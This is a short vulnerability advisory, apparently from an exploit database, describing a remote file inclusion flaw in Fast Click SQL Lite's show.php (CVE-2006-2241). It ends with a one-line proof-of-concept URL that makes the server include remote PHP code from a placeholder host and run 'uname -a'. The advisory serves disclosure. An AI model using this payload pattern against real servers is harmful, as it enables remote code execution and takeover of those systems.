Fast Click SQL Lite 1.1.2/1.1.3 - 'show.php' Remote File Inclusion
Author: R@1D3N
type: webapps
platform: php
port:
date_added: 2006-05-03
date_updated: 2016-12-29
verified: 1
codes: CVE-2006-2241;OSVDB-25275
tags:
aliases:
screenshot_url:
application_url:
source: https://www.securityfocus.com/bid/17819/info
Fast Click SQL Lite is prone to a remote file-include vulnerability. This issue is due to a failure in the application to properly sanitize user-supplied input.
An attacker can exploit this issue to include an arbitrary remote file containing malicious PHP code and execute it in the context of the webserver process. This may allow the attacker to compromise the application and the underlying system; other attacks are also possible.
This issue is reported to affect versions 1.1.3 and prior.
http://www.example.com/[path]/show.php?path=http://www.example.com/cmd.gif?&cmd=uname -a